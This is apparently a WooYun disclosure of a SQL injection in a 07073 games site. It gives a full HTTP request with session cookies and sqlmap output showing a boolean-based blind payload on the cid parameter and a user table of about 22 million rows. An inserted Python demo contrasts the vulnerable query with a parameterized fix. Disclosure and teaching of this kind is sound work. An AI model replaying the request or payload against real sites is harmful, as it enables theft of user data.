
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0102290

Title: SQL injection on a 07073 Games site affects user data for the fourth time

Vendor: 07073.com

Author: BMa

Submitted: 2015-03-19 12:51

Fixed: 2015-05-03 13:16

Published: 2015-05-03 13:16

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Bookmarks: 4


Vulnerability details

Disclosure status:

2015-03-19: Details sent to the vendor, awaiting vendor handling
2015-03-19: Vendor confirmed; details visible to the vendor only
2015-03-29: Details disclosed to core white hats and domain experts
2015-04-08: Details disclosed to regular white hats
2015-04-18: Details disclosed to intern white hats
2015-05-03: Details disclosed to the public

Brief description:

SQL injection on a 07073 Games site, for the fourth time, affecting the data of 22,044,669 users
Sorry, here I am again, but on the other hand, me reporting the problem is far better than someone else dragging off the database
I never dump other people's databases and never snoop; a good socialist youth

Detailed description:

company.07073.com


POST /click HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://company.07073.com
Referer: http://company.07073.com/8729.html
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
Host: company.07073.com
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22e901c1f669d2d643c4ee936468d6509c%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22125.78.248.83%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F33.0.1750.170+Safari%2F537.36+%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1426734513%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D30bfde05526ae61ba411a0babcd6cadf; CNZZDATA30095910=cnzz_eid%3D1437763485-1426487774-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426725501; CNZZDATA30078424=cnzz_eid%3D1529681690-1426490357-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426729241; DedeUserID=22166706; DedeUserID__ckMd5=195d5f4d055945af; DedeUsername=bma123; DedeUsername__ckMd5=ed597bcceffae423; loginState=1; loginName=bma123; www07073=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22b2315a9a9db5140b17c8b734a0bfde8e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22183.57.47.59%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A36.0%29+Gecko%2F20100101+Firefox%2F36.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1426729229%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dcdfc00377f4a29347793a5622bcc27e9; PHPSESSID=98946e97e1d599248d8ec8b875b9a45e; from_url=http%3A//v.07073.com/
Accept-Encoding: gzip, deflate
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
cid=1


[Screenshots 1.jpg, 2.jpg, 3.jpg, 4.jpg]


current user:    'amdbuser@%'
current database: 'kf07073'
[11:46:05] [INFO] testing connection to the target URL
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: cid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=1 AND 5900=5900
---
[11:46:07] [INFO] testing MySQL
[11:46:07] [INFO] confirming MySQL
[11:46:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows NT 4.0
back-end DBMS: MySQL >= 5.0.0
[11:46:07] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:46:07] [INFO] retrieved: 22044669
Database: bbs073
+------------+----------+
| Table      | Entries  |
+------------+----------+
| uc_members | 22044669 |
+------------+----------+
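The sqlmap output above shows a boolean-based blind injection through the `cid` POST parameter: the page responds differently for `cid=1 AND 5900=5900` than for a false condition, and that one-bit difference is enough to read the database. As an added illustration that is not code from the report or from 07073, the following Python script reproduces the query pattern behind that behaviour against an in-memory SQLite table and places the parameterized, type-checked version beside it. The table name `clicks`, its columns and the sample rows are constructed assumptions, not the site's actual schema.

```python
import re
import sqlite3

# Constructed sample data standing in for a click-tracking table; the table
# name, columns and rows are assumptions for this example, not 07073's schema.
SAMPLE_ROWS = [(1, "/8729.html", 10), (2, "/8730.html", 3)]


def make_db() -> sqlite3.Connection:
    """Build an in-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE clicks (cid INTEGER PRIMARY KEY, url TEXT, hits INTEGER)")
    conn.executemany("INSERT INTO clicks VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def click_vulnerable(conn: sqlite3.Connection, cid: str):
    """The weak pattern: the raw POST value is spliced into the WHERE clause.

    With "1 AND 5900=5900" the row is still returned; with "1 AND 5900=5901"
    it is not. That observable difference is the oracle a boolean-based blind
    injection reads one bit at a time.
    """
    sql = f"SELECT url FROM clicks WHERE cid = {cid}"
    return conn.execute(sql).fetchone()


def is_valid_cid(cid: str) -> bool:
    """Accept only an ASCII decimal integer; reject anything else outright."""
    return re.fullmatch(r"[0-9]+", cid) is not None


def click_safe(conn: sqlite3.Connection, cid: str):
    """The hardened form: validate the type, then bind the value as a parameter.

    A bound parameter is always data, so the value can never alter the query's
    structure; the explicit validation also gives a clean 400-style rejection
    and a log line instead of a silent query error.
    """
    if not is_valid_cid(cid):
        raise ValueError("cid must be a decimal integer")
    return conn.execute("SELECT url FROM clicks WHERE cid = ?", (int(cid),)).fetchone()


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 AND 5900=5900", "1 AND 5900=5901"):
        print(f"vulnerable cid={value!r:22} -> {click_vulnerable(db, value)}")
    for value in ("1", "1 AND 5900=5900"):
        try:
            print(f"safe       cid={value!r:22} -> {click_safe(db, value)}")
        except ValueError as exc:
            print(f"safe       cid={value!r:22} -> rejected ({exc})")
```

Run it and the vulnerable handler answers the true and false conditions differently, while the safe handler returns the same row for a legitimate `cid` and rejects both injected strings before any SQL is built. The same two-step fix, strict input typing plus bound parameters, applies to the PHP stack this endpoint appears to run on (CodeIgniter's `ci_session` cookie is visible in the request); the concrete database API differs, the principle does not.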

Proof of vulnerability:

Fix recommendation:

Copyright: when reposting, credit the source BMa@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-03-19 13:15

Vendor reply:

Thanks for providing the vulnerability information

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-03-19 12:55 | 黄口小儿 ( Regular white hat | Rank:163 Vulns:49 | coffeesafe's account)

    mark

  2. 2015-03-19 13:00 | 天地不仁 以万物为刍狗 ( Regular white hat | Rank:977 Vulns:264 | Heaven and earth are not benevolent; they treat all things as straw dogs)

    A whole series.....

  3. 2015-03-19 13:02 | 浩天 Certified white hat ( Regular white hat | Rank:915 Vulns:79 | On vacation...)

    The next one will go through the minor process

  4. 2015-03-19 14:20 | luwikes ( Regular white hat | Rank:512 Vulns:77 | Studying hard~~~)

    @浩天 You can't put it through the minor process just because he reports a lot; I'd like to see the vulnerability details

  5. 2015-03-19 16:14 | greg.wu ( Regular white hat | Rank:815 Vulns:99 | Just passing by~)

    Farming rank this obviously...

  6. 2015-03-19 16:22 | BMa ( Regular white hat | Rank:1776 Vulns:200 )

    Each one is a different site and a different endpoint, but every one can dump the user database....